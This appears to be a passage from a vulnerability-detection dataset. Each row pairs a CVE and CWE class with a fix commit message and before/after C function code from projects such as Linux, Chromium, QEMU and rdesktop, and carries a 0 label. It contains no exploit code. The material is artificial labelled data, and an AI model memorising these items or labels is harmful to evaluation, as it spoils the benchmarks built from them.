struct splice_desc sd = {
.len = 0,
.total_len = *count,
.pos = offset,
.u.data = rqstp,
};
int host_err;
rqstp->rq_next_page = rqstp->rq_respages + 1;
host_err = splice_direct_to_actor(file, &sd, nfsd_direct_splice_actor);
return nfsd_finish_read(file, count, host_err);
}
|
C
|
linux
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/d4cd2b2c0953ad7e9fa988c234eb9361be80fe81
|
d4cd2b2c0953ad7e9fa988c234eb9361be80fe81
|
DevTools: 'Overrides' UI overlay obstructs page and element inspector
BUG=302862
R=vsevik@chromium.org
Review URL: https://codereview.chromium.org/40233006
git-svn-id: svn://svn.chromium.org/blink/trunk@160559 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
void InspectorOverlay::onTimer(Timer<InspectorOverlay>*)
{
m_drawViewSize = false;
update();
}
|
void InspectorOverlay::onTimer(Timer<InspectorOverlay>*)
{
m_drawViewSize = false;
update();
}
|
C
|
Chrome
| 0 |
CVE-2016-6198
|
https://www.cvedetails.com/cve/CVE-2016-6198/
|
CWE-284
|
https://github.com/torvalds/linux/commit/54d5ca871e72f2bb172ec9323497f01cd5091ec7
|
54d5ca871e72f2bb172ec9323497f01cd5091ec7
|
vfs: add vfs_select_inode() helper
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Cc: <stable@vger.kernel.org> # v4.2+
|
SYSCALL_DEFINE2(fchmod, unsigned int, fd, umode_t, mode)
{
struct fd f = fdget(fd);
int err = -EBADF;
if (f.file) {
audit_file(f.file);
err = chmod_common(&f.file->f_path, mode);
fdput(f);
}
return err;
}
|
SYSCALL_DEFINE2(fchmod, unsigned int, fd, umode_t, mode)
{
struct fd f = fdget(fd);
int err = -EBADF;
if (f.file) {
audit_file(f.file);
err = chmod_common(&f.file->f_path, mode);
fdput(f);
}
return err;
}
|
C
|
linux
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/0008e75b613a252c8a5e2cca58c8376bf0e0a6a8
|
0008e75b613a252c8a5e2cca58c8376bf0e0a6a8
|
Disables PanelBrowserTest.MinimizeTwoPanelsWithoutTabbedWindow on
windows as it's causing other interactive ui tests to fail.
BUG=103253
TBR=dimich@chromium.org
R=dimich@chromium.org
Review URL: http://codereview.chromium.org/8467025
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@108901 0039d316-1c4b-4281-b951-d872f2087c98
|
void WaitForDownload() {
if (!saw_download_) {
waiting_ = true;
ui_test_utils::RunMessageLoop();
EXPECT_TRUE(saw_download_);
waiting_ = false;
}
}
|
void WaitForDownload() {
if (!saw_download_) {
waiting_ = true;
ui_test_utils::RunMessageLoop();
EXPECT_TRUE(saw_download_);
waiting_ = false;
}
}
|
C
|
Chrome
| 0 |
CVE-2013-0922
|
https://www.cvedetails.com/cve/CVE-2013-0922/
|
CWE-264
|
https://github.com/chromium/chromium/commit/28aaa72a03df96fa1934876b0efbbc7e6b4b38af
|
28aaa72a03df96fa1934876b0efbbc7e6b4b38af
|
Revert cross-origin auth prompt blocking.
BUG=174129
Review URL: https://chromiumcodereview.appspot.com/12183030
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@181113 0039d316-1c4b-4281-b951-d872f2087c98
|
net::RequestPriority DetermineRequestPriority(
const ResourceHostMsg_Request& request_data) {
switch (request_data.priority) {
case WebKit::WebURLRequest::PriorityVeryHigh:
return net::HIGHEST;
case WebKit::WebURLRequest::PriorityHigh:
return net::MEDIUM;
case WebKit::WebURLRequest::PriorityMedium:
return net::LOW;
case WebKit::WebURLRequest::PriorityLow:
return net::LOWEST;
case WebKit::WebURLRequest::PriorityVeryLow:
return net::IDLE;
case WebKit::WebURLRequest::PriorityUnresolved:
default:
NOTREACHED();
return net::LOW;
}
}
|
net::RequestPriority DetermineRequestPriority(
const ResourceHostMsg_Request& request_data) {
switch (request_data.priority) {
case WebKit::WebURLRequest::PriorityVeryHigh:
return net::HIGHEST;
case WebKit::WebURLRequest::PriorityHigh:
return net::MEDIUM;
case WebKit::WebURLRequest::PriorityMedium:
return net::LOW;
case WebKit::WebURLRequest::PriorityLow:
return net::LOWEST;
case WebKit::WebURLRequest::PriorityVeryLow:
return net::IDLE;
case WebKit::WebURLRequest::PriorityUnresolved:
default:
NOTREACHED();
return net::LOW;
}
}
|
C
|
Chrome
| 0 |
CVE-2016-5126
|
https://www.cvedetails.com/cve/CVE-2016-5126/
|
CWE-119
|
https://git.qemu.org/?p=qemu.git;a=commit;h=a6b3167fa0e825aebb5a7cd8b437b6d41584a196
|
a6b3167fa0e825aebb5a7cd8b437b6d41584a196
| null |
static int iscsi_get_info(BlockDriverState *bs, BlockDriverInfo *bdi)
{
IscsiLun *iscsilun = bs->opaque;
bdi->unallocated_blocks_are_zero = iscsilun->lbprz;
bdi->can_write_zeroes_with_unmap = iscsilun->lbprz && iscsilun->lbp.lbpws;
bdi->cluster_size = iscsilun->cluster_sectors * BDRV_SECTOR_SIZE;
return 0;
}
|
static int iscsi_get_info(BlockDriverState *bs, BlockDriverInfo *bdi)
{
IscsiLun *iscsilun = bs->opaque;
bdi->unallocated_blocks_are_zero = iscsilun->lbprz;
bdi->can_write_zeroes_with_unmap = iscsilun->lbprz && iscsilun->lbp.lbpws;
bdi->cluster_size = iscsilun->cluster_sectors * BDRV_SECTOR_SIZE;
return 0;
}
|
C
|
qemu
| 0 |
CVE-2016-2508
|
https://www.cvedetails.com/cve/CVE-2016-2508/
|
CWE-119
|
https://android.googlesource.com/platform/frameworks/av/+/f81038006b4c59a5a148dcad887371206033c28f
|
f81038006b4c59a5a148dcad887371206033c28f
|
MPEG4Extractor: ensure kKeyTrackID exists before creating an MPEG4Source as track.
GenericSource: return error when no track exists.
SampleIterator: make sure mSamplesPerChunk is not zero before using it as divisor.
Bug: 21657957
Bug: 23705695
Bug: 22802344
Bug: 28799341
Change-Id: I7664992ade90b935d3f255dcd43ecc2898f30b04
(cherry picked from commit 0386c91b8a910a134e5898ffa924c1b6c7560b13)
|
status_t NuPlayer::GenericSource::seekTo(int64_t seekTimeUs) {
sp<AMessage> msg = new AMessage(kWhatSeek, this);
msg->setInt64("seekTimeUs", seekTimeUs);
sp<AMessage> response;
status_t err = msg->postAndAwaitResponse(&response);
if (err == OK && response != NULL) {
CHECK(response->findInt32("err", &err));
}
return err;
}
|
status_t NuPlayer::GenericSource::seekTo(int64_t seekTimeUs) {
sp<AMessage> msg = new AMessage(kWhatSeek, this);
msg->setInt64("seekTimeUs", seekTimeUs);
sp<AMessage> response;
status_t err = msg->postAndAwaitResponse(&response);
if (err == OK && response != NULL) {
CHECK(response->findInt32("err", &err));
}
return err;
}
|
C
|
Android
| 0 |
CVE-2018-18349
|
https://www.cvedetails.com/cve/CVE-2018-18349/
|
CWE-732
|
https://github.com/chromium/chromium/commit/5f8671e7667b8b133bd3664100012a3906e92d65
|
5f8671e7667b8b133bd3664100012a3906e92d65
|
Add a check for disallowing remote frame navigations to local resources.
Previously, RemoteFrame navigations did not perform any renderer-side
checks and relied solely on the browser-side logic to block disallowed
navigations via mechanisms like FilterURL. This means that blocked
remote frame navigations were silently navigated to about:blank
without any console error message.
This CL adds a CanDisplay check to the remote navigation path to match
an equivalent check done for local frame navigations. This way, the
renderer can consistently block disallowed navigations in both cases
and output an error message.
Bug: 894399
Change-Id: I172f68f77c1676f6ca0172d2a6c78f7edc0e3b7a
Reviewed-on: https://chromium-review.googlesource.com/c/1282390
Reviewed-by: Charlie Reis <creis@chromium.org>
Reviewed-by: Nate Chapin <japhet@chromium.org>
Commit-Queue: Alex Moshchuk <alexmos@chromium.org>
Cr-Commit-Position: refs/heads/master@{#601022}
|
void CommitText(const char* text) {
JNIEnv* env = base::android::AttachCurrentThread();
base::android::ScopedJavaLocalRef<jobject> caller =
ime_adapter()->java_ime_adapter_for_testing(env);
base::android::ScopedJavaLocalRef<jstring> jtext =
base::android::ConvertUTF8ToJavaString(env, text);
ime_adapter()->CommitText(
env, base::android::JavaParamRef<jobject>(env, caller.obj()),
base::android::JavaParamRef<jobject>(env, jtext.obj()),
base::android::JavaParamRef<jstring>(env, jtext.obj()), 0);
}
|
void CommitText(const char* text) {
JNIEnv* env = base::android::AttachCurrentThread();
base::android::ScopedJavaLocalRef<jobject> caller =
ime_adapter()->java_ime_adapter_for_testing(env);
base::android::ScopedJavaLocalRef<jstring> jtext =
base::android::ConvertUTF8ToJavaString(env, text);
ime_adapter()->CommitText(
env, base::android::JavaParamRef<jobject>(env, caller.obj()),
base::android::JavaParamRef<jobject>(env, jtext.obj()),
base::android::JavaParamRef<jstring>(env, jtext.obj()), 0);
}
|
C
|
Chrome
| 0 |
CVE-2016-6289
|
https://www.cvedetails.com/cve/CVE-2016-6289/
|
CWE-190
|
https://git.php.net/?p=php-src.git;a=commit;h=0218acb7e756a469099c4ccfb22bce6c2bd1ef87
|
0218acb7e756a469099c4ccfb22bce6c2bd1ef87
| null |
static inline time_t FileTimeToUnixTime(const FILETIME FileTime)
{
__int64 UnixTime;
long *nsec = NULL;
SYSTEMTIME SystemTime;
FileTimeToSystemTime(&FileTime, &SystemTime);
UnixTime = ((__int64)FileTime.dwHighDateTime << 32) +
FileTime.dwLowDateTime;
UnixTime -= (SECS_BETWEEN_EPOCHS * SECS_TO_100NS);
if (nsec) {
*nsec = (UnixTime % SECS_TO_100NS) * (__int64)100;
}
UnixTime /= SECS_TO_100NS; /* now convert to seconds */
if ((time_t)UnixTime != UnixTime) {
UnixTime = 0;
}
return (time_t)UnixTime;
}
|
static inline time_t FileTimeToUnixTime(const FILETIME FileTime)
{
__int64 UnixTime;
long *nsec = NULL;
SYSTEMTIME SystemTime;
FileTimeToSystemTime(&FileTime, &SystemTime);
UnixTime = ((__int64)FileTime.dwHighDateTime << 32) +
FileTime.dwLowDateTime;
UnixTime -= (SECS_BETWEEN_EPOCHS * SECS_TO_100NS);
if (nsec) {
*nsec = (UnixTime % SECS_TO_100NS) * (__int64)100;
}
UnixTime /= SECS_TO_100NS; /* now convert to seconds */
if ((time_t)UnixTime != UnixTime) {
UnixTime = 0;
}
return (time_t)UnixTime;
}
|
C
|
php
| 0 |
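Editor's note on the entry above: FileTimeToUnixTime() converts a Windows FILETIME (100-nanosecond ticks since 1601-01-01) into a Unix time_t (seconds since 1970-01-01). The two macros it relies on correspond to 11,644,473,600 seconds between the epochs and 10,000,000 ticks per second. A worked standalone version with those constants spelled out; the truncating cast check mirrors the clamp in the code above, and the helper name is invented:

#include <stdint.h>
#include <stdio.h>
#include <time.h>

#define TICKS_PER_SEC    10000000LL      /* 100-ns units per second */
#define EPOCH_DIFF_SECS  11644473600LL   /* 1601-01-01 .. 1970-01-01 */

/* ticks: 64-bit FILETIME value (dwHighDateTime << 32 | dwLowDateTime). */
static time_t filetime_to_unix(uint64_t ticks)
{
    int64_t t = (int64_t)(ticks / TICKS_PER_SEC) - EPOCH_DIFF_SECS;
    if ((time_t)t != t)      /* clamp when time_t cannot represent the value */
        return 0;
    return (time_t)t;
}

int main(void)
{
    /* 2009-02-13 23:31:30 UTC == Unix 1234567890 */
    uint64_t ft = (uint64_t)(1234567890LL + EPOCH_DIFF_SECS) * TICKS_PER_SEC;
    printf("%lld\n", (long long)filetime_to_unix(ft));
    return 0;
}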
CVE-2017-1000211
|
https://www.cvedetails.com/cve/CVE-2017-1000211/
|
CWE-416
|
https://github.com/ThomasDickey/lynx-snapshots/commit/280a61b300a1614f6037efc0902ff7ecf17146e9
|
280a61b300a1614f6037efc0902ff7ecf17146e9
|
snapshot of project "lynx", label v2-8-9dev_15b
|
void actually_set_style(HTStructured * me)
{
if (!me->text) { /* First time through */
LYGetChartransInfo(me);
UCSetTransParams(&me->T,
me->UCLYhndl, me->UCI,
HTAnchor_getUCLYhndl(me->node_anchor,
UCT_STAGE_HTEXT),
HTAnchor_getUCInfoStage(me->node_anchor,
UCT_STAGE_HTEXT));
me->text = HText_new2(me->node_anchor, me->target);
HText_beginAppend(me->text);
HText_setStyle(me->text, me->new_style);
me->in_word = NO;
LYCheckForContentBase(me);
} else {
HText_setStyle(me->text, me->new_style);
}
me->old_style = me->new_style;
me->style_change = NO;
}
|
void actually_set_style(HTStructured * me)
{
if (!me->text) { /* First time through */
LYGetChartransInfo(me);
UCSetTransParams(&me->T,
me->UCLYhndl, me->UCI,
HTAnchor_getUCLYhndl(me->node_anchor,
UCT_STAGE_HTEXT),
HTAnchor_getUCInfoStage(me->node_anchor,
UCT_STAGE_HTEXT));
me->text = HText_new2(me->node_anchor, me->target);
HText_beginAppend(me->text);
HText_setStyle(me->text, me->new_style);
me->in_word = NO;
LYCheckForContentBase(me);
} else {
HText_setStyle(me->text, me->new_style);
}
me->old_style = me->new_style;
me->style_change = NO;
}
|
C
|
lynx-snapshots
| 0 |
CVE-2018-20182
|
https://www.cvedetails.com/cve/CVE-2018-20182/
|
CWE-119
|
https://github.com/rdesktop/rdesktop/commit/4dca546d04321a610c1835010b5dad85163b65e1
|
4dca546d04321a610c1835010b5dad85163b65e1
|
Malicious RDP server security fixes
This commit includes fixes for a set of 21 vulnerabilities in
rdesktop when a malicious RDP server is used.
All vulnerabilities was identified and reported by Eyal Itkin.
* Add rdp_protocol_error function that is used in several fixes
* Refactor of process_bitmap_updates
* Fix possible integer overflow in s_check_rem() on 32bit arch
* Fix memory corruption in process_bitmap_data - CVE-2018-8794
* Fix remote code execution in process_bitmap_data - CVE-2018-8795
* Fix remote code execution in process_plane - CVE-2018-8797
* Fix Denial of Service in mcs_recv_connect_response - CVE-2018-20175
* Fix Denial of Service in mcs_parse_domain_params - CVE-2018-20175
* Fix Denial of Service in sec_parse_crypt_info - CVE-2018-20176
* Fix Denial of Service in sec_recv - CVE-2018-20176
* Fix minor information leak in rdpdr_process - CVE-2018-8791
* Fix Denial of Service in cssp_read_tsrequest - CVE-2018-8792
* Fix remote code execution in cssp_read_tsrequest - CVE-2018-8793
* Fix Denial of Service in process_bitmap_data - CVE-2018-8796
* Fix minor information leak in rdpsnd_process_ping - CVE-2018-8798
* Fix Denial of Service in process_secondary_order - CVE-2018-8799
* Fix remote code execution in in ui_clip_handle_data - CVE-2018-8800
* Fix major information leak in ui_clip_handle_data - CVE-2018-20174
* Fix memory corruption in rdp_in_unistr - CVE-2018-20177
* Fix Denial of Service in process_demand_active - CVE-2018-20178
* Fix remote code execution in lspci_process - CVE-2018-20179
* Fix remote code execution in rdpsnddbg_process - CVE-2018-20180
* Fix remote code execution in seamless_process - CVE-2018-20181
* Fix remote code execution in seamless_process_line - CVE-2018-20182
|
rdp_send_control(uint16 action)
{
STREAM s;
s = rdp_init_data(8);
out_uint16_le(s, action);
out_uint16(s, 0); /* userid */
out_uint32(s, 0); /* control id */
s_mark_end(s);
rdp_send_data(s, RDP_DATA_PDU_CONTROL);
}
|
rdp_send_control(uint16 action)
{
STREAM s;
s = rdp_init_data(8);
out_uint16_le(s, action);
out_uint16(s, 0); /* userid */
out_uint32(s, 0); /* control id */
s_mark_end(s);
rdp_send_data(s, RDP_DATA_PDU_CONTROL);
}
|
C
|
rdesktop
| 0 |
CVE-2017-15423
|
https://www.cvedetails.com/cve/CVE-2017-15423/
|
CWE-310
|
https://github.com/chromium/chromium/commit/a263d1cf62a9c75be6aaafdec88aacfcef1e8fd2
|
a263d1cf62a9c75be6aaafdec88aacfcef1e8fd2
|
Roll src/third_party/boringssl/src 664e99a64..696c13bd6
https://boringssl.googlesource.com/boringssl/+log/664e99a6486c293728097c661332f92bf2d847c6..696c13bd6ab78011adfe7b775519c8b7cc82b604
BUG=778101
Change-Id: I8dda4f3db952597148e3c7937319584698d00e1c
Reviewed-on: https://chromium-review.googlesource.com/747941
Reviewed-by: Avi Drissman <avi@chromium.org>
Reviewed-by: David Benjamin <davidben@chromium.org>
Commit-Queue: Steven Valdez <svaldez@chromium.org>
Cr-Commit-Position: refs/heads/master@{#513774}
|
void BrowserMainLoop::GetCompositingModeReporter(
viz::mojom::CompositingModeReporterRequest request) {
bool use_viz =
base::CommandLine::ForCurrentProcess()->HasSwitch(switches::kEnableViz);
if (IsUsingMus() || use_viz) {
} else {
compositing_mode_reporter_bindings_.AddBinding(
compositing_mode_reporter_impl_.get(), std::move(request));
}
}
|
void BrowserMainLoop::GetCompositingModeReporter(
viz::mojom::CompositingModeReporterRequest request) {
bool use_viz =
base::CommandLine::ForCurrentProcess()->HasSwitch(switches::kEnableViz);
if (IsUsingMus() || use_viz) {
} else {
compositing_mode_reporter_bindings_.AddBinding(
compositing_mode_reporter_impl_.get(), std::move(request));
}
}
|
C
|
Chrome
| 0 |
CVE-2013-2929
|
https://www.cvedetails.com/cve/CVE-2013-2929/
|
CWE-264
|
https://github.com/torvalds/linux/commit/d049f74f2dbe71354d43d393ac3a188947811348
|
d049f74f2dbe71354d43d393ac3a188947811348
|
exec/ptrace: fix get_dumpable() incorrect tests
The get_dumpable() return value is not boolean. Most users of the
function actually want to be testing for non-SUID_DUMP_USER(1) rather than
SUID_DUMP_DISABLE(0). The SUID_DUMP_ROOT(2) is also considered a
protected state. Almost all places did this correctly, excepting the two
places fixed in this patch.
Wrong logic:
if (dumpable == SUID_DUMP_DISABLE) { /* be protective */ }
or
if (dumpable == 0) { /* be protective */ }
or
if (!dumpable) { /* be protective */ }
Correct logic:
if (dumpable != SUID_DUMP_USER) { /* be protective */ }
or
if (dumpable != 1) { /* be protective */ }
Without this patch, if the system had set the sysctl fs/suid_dumpable=2, a
user was able to ptrace attach to processes that had dropped privileges to
that user. (This may have been partially mitigated if Yama was enabled.)
The macros have been moved into the file that declares get/set_dumpable(),
which means things like the ia64 code can see them too.
CVE-2013-2929
Reported-by: Vasily Kulikov <segoon@openwall.com>
Signed-off-by: Kees Cook <keescook@chromium.org>
Cc: "Luck, Tony" <tony.luck@intel.com>
Cc: Oleg Nesterov <oleg@redhat.com>
Cc: "Eric W. Biederman" <ebiederm@xmission.com>
Cc: <stable@vger.kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
|
int bprm_change_interp(char *interp, struct linux_binprm *bprm)
{
/* If a binfmt changed the interp, free it first. */
if (bprm->interp != bprm->filename)
kfree(bprm->interp);
bprm->interp = kstrdup(interp, GFP_KERNEL);
if (!bprm->interp)
return -ENOMEM;
return 0;
}
|
int bprm_change_interp(char *interp, struct linux_binprm *bprm)
{
/* If a binfmt changed the interp, free it first. */
if (bprm->interp != bprm->filename)
kfree(bprm->interp);
bprm->interp = kstrdup(interp, GFP_KERNEL);
if (!bprm->interp)
return -ENOMEM;
return 0;
}
|
C
|
linux
| 0 |
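The get_dumpable() commit message above already spells out the wrong and correct tests; the minimal sketch below just encodes both predicates with the SUID_DUMP_* values quoted in the message (0, 1, 2) so the difference for SUID_DUMP_ROOT is visible. The helper names are made up for illustration and this is not the kernel code itself.

#include <stdio.h>

/* Values as described in the commit message. */
#define SUID_DUMP_DISABLE 0   /* dumping disabled */
#define SUID_DUMP_USER    1   /* dump as the user of the process */
#define SUID_DUMP_ROOT    2   /* dump as root; also a protected state */

/* Wrong: only SUID_DUMP_DISABLE is treated as protected, so a
 * dumpable value of SUID_DUMP_ROOT (2) slips through. */
static int needs_protection_wrong(int dumpable)
{
    return dumpable == SUID_DUMP_DISABLE;
}

/* Correct: everything other than SUID_DUMP_USER is protected. */
static int needs_protection_correct(int dumpable)
{
    return dumpable != SUID_DUMP_USER;
}

int main(void)
{
    for (int d = SUID_DUMP_DISABLE; d <= SUID_DUMP_ROOT; d++)
        printf("dumpable=%d wrong=%d correct=%d\n",
               d, needs_protection_wrong(d), needs_protection_correct(d));
    return 0;
}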
CVE-2016-5696
|
https://www.cvedetails.com/cve/CVE-2016-5696/
|
CWE-200
|
https://github.com/torvalds/linux/commit/75ff39ccc1bd5d3c455b6822ab09e533c551f758
|
75ff39ccc1bd5d3c455b6822ab09e533c551f758
|
tcp: make challenge acks less predictable
Yue Cao claims that current host rate limiting of challenge ACKS
(RFC 5961) could leak enough information to allow a patient attacker
to hijack TCP sessions. He will soon provide details in an academic
paper.
This patch increases the default limit from 100 to 1000, and adds
some randomization so that the attacker can no longer hijack
sessions without spending a considerable amount of probes.
Based on initial analysis and patch from Linus.
Note that we also have per socket rate limiting, so it is tempting
to remove the host limit in the future.
v2: randomize the count of challenge acks per second, not the period.
Fixes: 282f23c6ee34 ("tcp: implement RFC 5961 3.2")
Reported-by: Yue Cao <ycao009@ucr.edu>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Suggested-by: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Yuchung Cheng <ycheng@google.com>
Cc: Neal Cardwell <ncardwell@google.com>
Acked-by: Neal Cardwell <ncardwell@google.com>
Acked-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
|
static void tcp_snd_una_update(struct tcp_sock *tp, u32 ack)
{
u32 delta = ack - tp->snd_una;
sock_owned_by_me((struct sock *)tp);
u64_stats_update_begin_raw(&tp->syncp);
tp->bytes_acked += delta;
u64_stats_update_end_raw(&tp->syncp);
tp->snd_una = ack;
}
|
static void tcp_snd_una_update(struct tcp_sock *tp, u32 ack)
{
u32 delta = ack - tp->snd_una;
sock_owned_by_me((struct sock *)tp);
u64_stats_update_begin_raw(&tp->syncp);
tp->bytes_acked += delta;
u64_stats_update_end_raw(&tp->syncp);
tp->snd_una = ack;
}
|
C
|
linux
| 0 |
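The challenge-ACK commit message above describes raising the per-second limit and randomizing the count so an attacker can no longer rely on a fixed global budget. The user-space sketch below only illustrates that idea of drawing a fresh random budget around a configured limit each second; pick_challenge_budget is a hypothetical helper and the real kernel logic differs in detail.

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

/* Pick a per-second challenge-ACK budget at random around a configured
 * limit instead of using the fixed limit itself, so the counter cannot
 * be inferred by probing. Illustration only, not the kernel code. */
static unsigned int pick_challenge_budget(unsigned int limit)
{
    unsigned int half = limit / 2;
    return half + (unsigned int)(rand() % (limit ? limit : 1));
}

int main(void)
{
    srand((unsigned int)time(NULL));
    unsigned int limit = 1000;   /* the raised default mentioned in the patch */

    for (int second = 0; second < 5; second++)
        printf("second %d: budget = %u challenge ACKs\n",
               second, pick_challenge_budget(limit));
    return 0;
}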
null | null | null |
https://github.com/chromium/chromium/commit/f2f703241635fa96fa630b83afcc9a330cc21b7e
|
f2f703241635fa96fa630b83afcc9a330cc21b7e
|
CrOS Shelf: Get rid of 'split view' mode for shelf background
In the new UI, "maximized" and "split view" are treated the same in
specs, so there is no more need for a separate "split view" mode. This
folds it into the "maximized" mode.
Note that the only thing that _seems_ different in
shelf_background_animator is ShelfBackgroundAnimator::kMaxAlpha (255)
vs kShelfTranslucentMaximizedWindow (254), which should be virtually
impossible to distinguish.
This CL therefore does not have any visual effect (and doesn't
directly fix the linked bug, but is relevant).
Bug: 899289
Change-Id: I60947338176ac15ca016b1ba4edf13d16362cb24
Reviewed-on: https://chromium-review.googlesource.com/c/1469741
Commit-Queue: Xiyuan Xia <xiyuan@chromium.org>
Reviewed-by: Xiyuan Xia <xiyuan@chromium.org>
Auto-Submit: Manu Cornet <manucornet@chromium.org>
Cr-Commit-Position: refs/heads/master@{#631752}
|
aura::Window* CreateTestWindow() {
aura::Window* window = window_factory::NewWindow().release();
window->SetProperty(aura::client::kShowStateKey, ui::SHOW_STATE_NORMAL);
window->SetType(aura::client::WINDOW_TYPE_NORMAL);
window->Init(ui::LAYER_TEXTURED);
ParentWindowInPrimaryRootWindow(window);
return window;
}
|
aura::Window* CreateTestWindow() {
aura::Window* window = window_factory::NewWindow().release();
window->SetProperty(aura::client::kShowStateKey, ui::SHOW_STATE_NORMAL);
window->SetType(aura::client::WINDOW_TYPE_NORMAL);
window->Init(ui::LAYER_TEXTURED);
ParentWindowInPrimaryRootWindow(window);
return window;
}
|
C
|
Chrome
| 0 |
CVE-2011-2495
|
https://www.cvedetails.com/cve/CVE-2011-2495/
|
CWE-264
|
https://github.com/torvalds/linux/commit/1d1221f375c94ef961ba8574ac4f85c8870ddd51
|
1d1221f375c94ef961ba8574ac4f85c8870ddd51
|
proc: restrict access to /proc/PID/io
/proc/PID/io may be used for gathering private information. E.g. for
openssh and vsftpd daemons wchars/rchars may be used to learn the
precise password length. Restrict it to processes being able to ptrace
the target process.
ptrace_may_access() is needed to prevent keeping open file descriptor of
"io" file, executing setuid binary and gathering io information of the
setuid'ed process.
Signed-off-by: Vasiliy Kulikov <segoon@openwall.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
|
static int do_proc_readlink(struct path *path, char __user *buffer, int buflen)
{
char *tmp = (char*)__get_free_page(GFP_TEMPORARY);
char *pathname;
int len;
if (!tmp)
return -ENOMEM;
pathname = d_path(path, tmp, PAGE_SIZE);
len = PTR_ERR(pathname);
if (IS_ERR(pathname))
goto out;
len = tmp + PAGE_SIZE - 1 - pathname;
if (len > buflen)
len = buflen;
if (copy_to_user(buffer, pathname, len))
len = -EFAULT;
out:
free_page((unsigned long)tmp);
return len;
}
|
static int do_proc_readlink(struct path *path, char __user *buffer, int buflen)
{
char *tmp = (char*)__get_free_page(GFP_TEMPORARY);
char *pathname;
int len;
if (!tmp)
return -ENOMEM;
pathname = d_path(path, tmp, PAGE_SIZE);
len = PTR_ERR(pathname);
if (IS_ERR(pathname))
goto out;
len = tmp + PAGE_SIZE - 1 - pathname;
if (len > buflen)
len = buflen;
if (copy_to_user(buffer, pathname, len))
len = -EFAULT;
out:
free_page((unsigned long)tmp);
return len;
}
|
C
|
linux
| 0 |
CVE-2014-1713
|
https://www.cvedetails.com/cve/CVE-2014-1713/
|
CWE-399
|
https://github.com/chromium/chromium/commit/f85a87ec670ad0fce9d98d90c9a705b72a288154
|
f85a87ec670ad0fce9d98d90c9a705b72a288154
|
document.location bindings fix
BUG=352374
R=jochen@chromium.org
Review URL: https://codereview.chromium.org/196343011
git-svn-id: svn://svn.chromium.org/blink/trunk@169176 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
static void methodWithEnforceRangeUInt16MethodCallback(const v8::FunctionCallbackInfo<v8::Value>& info)
{
TRACE_EVENT_SET_SAMPLING_STATE("Blink", "DOMMethod");
TestObjectV8Internal::methodWithEnforceRangeUInt16Method(info);
TRACE_EVENT_SET_SAMPLING_STATE("V8", "V8Execution");
}
|
static void methodWithEnforceRangeUInt16MethodCallback(const v8::FunctionCallbackInfo<v8::Value>& info)
{
TRACE_EVENT_SET_SAMPLING_STATE("Blink", "DOMMethod");
TestObjectV8Internal::methodWithEnforceRangeUInt16Method(info);
TRACE_EVENT_SET_SAMPLING_STATE("V8", "V8Execution");
}
|
C
|
Chrome
| 0 |
CVE-2016-3751
|
https://www.cvedetails.com/cve/CVE-2016-3751/
| null |
https://android.googlesource.com/platform/external/libpng/+/9d4853418ab2f754c2b63e091c29c5529b8b86ca
|
9d4853418ab2f754c2b63e091c29c5529b8b86ca
|
DO NOT MERGE Update libpng to 1.6.20
BUG:23265085
Change-Id: I85199805636d771f3597b691b63bc0bf46084833
(cherry picked from commit bbe98b40cda082024b669fa508931042eed18f82)
|
freebuffer(Image *image)
{
if (image->buffer) free(image->buffer);
image->buffer = NULL;
image->bufsize = 0;
image->allocsize = 0;
}
|
freebuffer(Image *image)
{
if (image->buffer) free(image->buffer);
image->buffer = NULL;
image->bufsize = 0;
image->allocsize = 0;
}
|
C
|
Android
| 0 |
CVE-2015-1265
|
https://www.cvedetails.com/cve/CVE-2015-1265/
| null |
https://github.com/chromium/chromium/commit/04ff52bb66284467ccb43d90800013b89ee8db75
|
04ff52bb66284467ccb43d90800013b89ee8db75
|
Switching AudioOutputAuthorizationHandler from using AudioManager interface to AudioSystem one.
BUG=672468
CQ_INCLUDE_TRYBOTS=master.tryserver.chromium.linux:linux_optional_gpu_tests_rel;master.tryserver.chromium.mac:mac_optional_gpu_tests_rel;master.tryserver.chromium.win:win_optional_gpu_tests_rel
Review-Url: https://codereview.chromium.org/2692203003
Cr-Commit-Position: refs/heads/master@{#450939}
|
void RenderProcessHostImpl::OnGpuSwitched() {
RecomputeAndUpdateWebKitPreferences();
}
|
void RenderProcessHostImpl::OnGpuSwitched() {
RecomputeAndUpdateWebKitPreferences();
}
|
C
|
Chrome
| 0 |
CVE-2015-3215
|
https://www.cvedetails.com/cve/CVE-2015-3215/
|
CWE-20
|
https://github.com/YanVugenfirer/kvm-guest-drivers-windows/commit/723416fa4210b7464b28eab89cc76252e6193ac1
|
723416fa4210b7464b28eab89cc76252e6193ac1
|
NetKVM: BZ#1169718: Checking the length only on read
Signed-off-by: Joseph Hindin <yhindin@rehat.com>
|
ProcessTCPHeader(tTcpIpPacketParsingResult _res, PVOID pIpHeader, ULONG len, USHORT ipHeaderSize)
{
ULONG tcpipDataAt;
tTcpIpPacketParsingResult res = _res;
tcpipDataAt = ipHeaderSize + sizeof(TCPHeader);
res.TcpUdp = ppresIsTCP;
if (len >= tcpipDataAt)
{
TCPHeader *pTcpHeader = (TCPHeader *)RtlOffsetToPointer(pIpHeader, ipHeaderSize);
res.xxpStatus = ppresXxpKnown;
res.xxpFull = TRUE;
tcpipDataAt = ipHeaderSize + TCP_HEADER_LENGTH(pTcpHeader);
res.XxpIpHeaderSize = tcpipDataAt;
}
else
{
DPrintf(2, ("tcp: %d < min headers %d\n", len, tcpipDataAt));
res.xxpFull = FALSE;
res.xxpStatus = ppresXxpIncomplete;
}
return res;
}
|
ProcessTCPHeader(tTcpIpPacketParsingResult _res, PVOID pIpHeader, ULONG len, USHORT ipHeaderSize)
{
ULONG tcpipDataAt;
tTcpIpPacketParsingResult res = _res;
tcpipDataAt = ipHeaderSize + sizeof(TCPHeader);
res.TcpUdp = ppresIsTCP;
if (len >= tcpipDataAt)
{
